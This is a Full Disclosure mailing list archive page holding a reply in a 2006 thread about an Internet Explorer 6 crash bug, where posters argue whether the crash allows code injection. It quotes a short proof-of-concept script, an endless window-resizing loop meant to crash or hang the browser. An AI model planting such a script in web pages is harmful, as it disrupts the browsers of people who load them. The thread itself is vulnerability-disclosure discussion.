Full Disclosure mailing list archives
Re: Internet Explorer Ver6.0.2800.1106 vulnerability
From: <c0redump () ackers org uk>
Date: Mon, 29 May 2006 22:03:29 +0100
Of course you can inject code into it. c.----- Original Message ----- From: Aaron Gray
To: drfrancky () securax org ; 0x80 () hush ai Cc: full-disclosure () lists grok org uk ; kgp.143 () gmail com Sent: Monday, May 29, 2006 9:30 PMSubject: Re: [Full-disclosure] Internet Explorer Ver6.0.2800.1106 vulnerability
a simple crash can lead to code exec but some people don't have knowledge/time to research it. they just report the crash and leave it of somebody else to make the actual code execute. sometimes simple crash is simple crash :-)) sometimes simple crash is remote code exec. Javor Ninov aka DrFrancky http://securitydot.net/
Look at the original post and you will see there is no where to inject any code. Aaron
<script> var wwidth = (window.innerWidth)?window.innerWidth: ((document.all )?document.body.offsetWidth:null); while (wwidth) { self.resizeBy(-999999, -1); } </script>
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability 0x80 (May 28)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability Javor Ninov (May 29)
- Re: Internet Explorer Ver6.0.2800.1106 vulnerability Aaron Gray (May 29)
- Re: Internet Explorer Ver6.0.2800.1106 vulnerability Valdis . Kletnieks (May 29)
- Re: Internet Explorer Ver6.0.2800.1106 vulnerability Aaron Gray (May 29)
- Re: Internet Explorer Ver6.0.2800.1106 vulnerability c0redump (May 29)
- Re: Internet Explorer Ver6.0.2800.1106 vulnerability Aaron Gray (May 30)
- Re: Internet Explorer Ver6.0.2800.1106 vulnerability c0redump (May 31)
- Re: Internet Explorer Ver6.0.2800.1106 vulnerability Aaron Gray (May 29)
- Re: Internet Explorer Ver 6.0.2800.1106 vulnerability Javor Ninov (May 29)